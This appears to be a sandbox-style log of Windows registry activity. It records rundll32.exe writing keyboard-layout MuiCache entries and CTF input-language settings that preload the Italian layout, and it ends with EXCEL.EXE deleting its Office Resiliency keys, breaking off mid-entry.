@%SystemRoot%\system32\input.dll,-5119
Georgian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
636
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
636
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
1136
rundll32.exe
delete key
HKEY_CURRENT_USER\Control Panel\Input Method\Hot Keys\00000104
1136
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
1136
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
ShowStatus
4
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
Transparency
255
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
Label
1
1136
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBar
ExtraIconsOnMinimized
0
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
2076
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2076
EXCEL.EXE
write
